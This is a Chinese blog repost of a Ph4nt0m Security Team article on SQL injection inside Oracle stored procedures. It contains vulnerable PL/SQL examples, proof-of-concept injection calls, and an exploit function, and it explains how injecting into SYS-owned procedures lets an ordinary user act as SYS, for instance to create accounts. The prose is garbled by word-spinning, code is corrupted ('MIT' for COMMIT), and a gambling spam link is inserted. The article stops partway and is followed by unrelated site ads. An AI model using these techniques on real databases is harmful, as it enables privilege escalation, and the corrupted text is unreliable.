oracle命令 yam,深入发掘ORACLE内部SQLINJECTION

深入挖掘ORACLE内部SQLINJECTION

Ph4nt0m Security Team

Issue 0x02, Phile #0x06 of 0x0A

''

'. 深刻发掘ORACLE内部SQLINJECTION .'

''

''

'. By kj021320 .'

'. kj021320_at_126. .'

''

一、前言

良久没写PAPER了,日久之疏勤成性。我感到在海内的ORACLE攻防技术研讨得比拟少,比

较欠缺。或者是我坐井观天。在国外许很多多的PAPER已经成为了ORACLE袭击泛亚娱乐技术:yuan01.bc88.info/fei的经典。

那么接下来的就是跟大家探讨一下对于ORACLE内部SQL注射技巧。信任大家都看过我写的

.ART OF WEBSQLINJECTION第2卷 ORACLE篇 .07年的初的时候,本文已经写好

.检测函数注入in ORACLE.。惋惜在偶的一次数据丧失中,许多PAPER进了宅兆。现在题目

换了为.深入挖掘ORACLE内部SQLINJECTION.,为什么·实在ORACLE的内部SQL注射不单单出

自于函数 存储过程,如果你是这样想的话,那就太狭窄了,其实还有好多的处所仍是会出现

SQL注射的。例如他的TRIGGER,SQLJ,JOB等等…盼望本文可以让你在ORACLE攻防中受益,接下

来就轮到大家拍砖了。

二、注释

在WEB上面SQLINJECTION已经成为当今所谓的“日”站主流。这里就不空话,那到数据库

层面到底什么样的存储过程/函数会出现SQLINJECTION呢·首先看一个例子:

Example1:

CREATE OR REPLACE PROCEDURE KJTEST(injcode in varchar2)

AS

BEGIN

execute immediate \'begin insert into KJTESTTABLE values(\'\'\''' injcode ''\'\'\');end;\';

END;

看以上的存储过程,把参数写入一个表中,在普通开发常常有这样的情形出现。

那么看下面的调用,如下会把字符串1写入表 KJTESTTABLE里面。

declare

begin

KJTEST(\'1\');

end;

那么现在可以对injcode进行POC一下

declare

begin

KJTEST(\'1\'\');dbms_output.put_line(\'\'hello\');

end;

执行这样的方法可以看到在节制台输出hello的字样。

OK,这个攻击的EXP就十分好写了!

declare

begin

KJTEST(\'1\'\');EXPCODE;dbms_output.put_line(\'\'hello\');

end;

那么,这样的存储过程中出现SQL注射,个别用户写的存储过程有这样的破绽,倒还好。

只能“日自己”。然而假如呈现在SYS SYSTEM这类的体系治理员用户的贮存进程中,问题就大

了。现在再看看ORA中,办法调用权限的模型。

如下,一个一般权限的用户KJ调用sys.dbms_metadata.get_ddl可以获取某个系统对象

的DDL源代码,那么当这个函数被调用的时候,由于该函数占有者是SYS 所以调用者被赋予

sys等同角色的权限。开端操作查询系统对象,而后把结果反还给KJ,再次转换为KJ自己的权

限 看下面的唆使:

用户 调用函数(转换为函数领有者的权限) 履行操作 获取成果 (转换为本人权限) 停止

看清楚上面的我们就能够持续了,如果在SYS用户的对象中有SQL打针涌现,那么咱们就

以SYS用户身份做事包含增加用户等。那么在上面的EXPCODE中,我们完整可以以SYS用户身

份执行execute immediate \'create user kj identified by kj\',OK上面的第一个例子我

们讨论到这里。

并不是所有的ORA内部SQL注射都可以这样使用的!在上述这个例子里面已经可以算长短

常少见的了。而且极好利用!再看下面一个例子

Example2:

CREATE OR REPLACE PROCEDURE KJTEST(injcode in varchar2)

AS

tbn varchar2(1000);

BEGIN

execute immediate \'select table_name from user_tables where table_name\'\'\''' injcode ''\'\'\'\'

into tbn;

dbms_output.put_line(tbn);

END;

那么我们畸形调用的时候则采取此方法:

declare

begin

KJTEST(\'KJTESTTABLE\');

end;

查看用户系统表中名字为KJTESTTABLE的记载。

OK,现在留心存储过程中使用动态执行SQL语句,因为目的运行的是单个SQL语句,那么我

们不能像例子1那样应用多语句进行攻打,但是我们可以把持当前语句执行的流程。有个方

法,就是我们放入一个树立EXP的函数。让这个SQL执行调用。看以下应用:

CREATE OR REPLACE FUNCTION KJHACKEREXP RETURN INTEGER AUTHID CURRENT_USER IS

RESULT INTEGER;

PRAGMA AUTONOMOUS_TRANSACTION;

BEGIN

EXECUTE IMMEDIATE \'INSERT INTO KJTESTTABLE VALUES(021320)\';

MIT;

RETURN(RESULT);

END KJHACKEREXP;

declare

begin

KJTEST(\'KJTESTTABLE\'\'''KJHACKEREXP()''\'\'\');

end;

OK,这样就是在ORACLE里面发生的SQLINJECTION,前戏结束!当初进入挖掘局部。

挖掘分为2部门:黑盒与白盒方式。

首先先容简单的是白盒方式,ORACLE中每个对象的SOURCE都会保留在数据库内的。那么

我们可以采用一个存储过程来获取SYS.DBMS_METADATA.GET_DDL,类似一下语句:

SELECT SYS.DBMS_METADATA.GET_DDL(\'FUNCTION\',\'KJHACKEREXP\')

FROM DUAL

可以获取该对象的Data Declare Source,当然你也可以自己查问:

SELECT . from all_source

但是是否这么简略呢·当然不会了,在ORACLE中,也供给了对存储过程函数等加密的手腕,

相似SQLSERVER的存储过程加密。所以当你查看ctxsys.CTX_DDL的时候会发明以下货色出现:

create or replace package body ctxsys.CTX_DDL wrapped

对,就是ORACLE中wrap加密编码了,那么就只能黑盒测试了,测试的时候如何去获取当时

ORACLE执行的操作呢·可以通过以下的方式:

阅读(225) | 评论(0) | 转发(0) |

0

上一篇:没有了

下一篇:没有了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值